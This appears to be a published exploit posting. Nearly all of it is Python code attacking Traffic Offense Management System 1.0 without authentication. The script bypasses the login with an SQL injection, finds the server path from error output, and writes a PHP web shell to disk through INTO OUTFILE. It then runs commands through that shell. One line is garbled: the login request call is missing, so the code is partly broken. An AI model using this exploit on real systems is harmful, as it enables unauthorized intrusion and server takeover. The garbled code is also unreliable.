Traffic Offense Management System 1.0 SQL Injection / Remote Code Execution

Credit: Tagoletta
Risk: Medium
Local: No
Remote: Yes

# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated) # Date: 19.08.2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: # Version: 1.0 # Tested on: Linux import requests import random import string import json from bs4 import BeautifulSoup url = input("TARGET = ") if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" payload= "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>" let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) session = requests.session() print("Login Bypass\n") request_url = url + "/classes/Login.php?f=login" post_data = {"username": "admin' or '1'='1'#", "password": ""} bypassUser =, data=post_data) data = json.loads(bypassUser.text) status = data["status"] if status == "success": print("Finding first driver\n") getHTML = session.get(url + "admin/?page=drivers") getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser') findFirstDriverID = getHTMLParser.find("a", {"class": "delete_data"}).get("data-id") print("Found firs driver ID : " + findFirstDriverID) print("\nFinding path") findPath = session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+'\'') findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")] findPath = findPath[findPath.index("<b>")+3:len(findPath)] parser = findPath.split('\\') parser.pop() findPath = "" for find in parser: findPath += find + "/" print("\nFound Path : " + findPath) shellPath = findPath[findPath.index("admin/"):len(findPath)] SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -" SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php") SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex()) print("\n\nShell Uploading...") session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+SQLtoRCE) print("\nShell Path : " + url+shellPath+shellname+".php") shellOutput = session.get(url+shellPath+shellname+".php?tago=whoami") print("\n\nShell Output : "+shellOutput.text) else: print("No bypass user")

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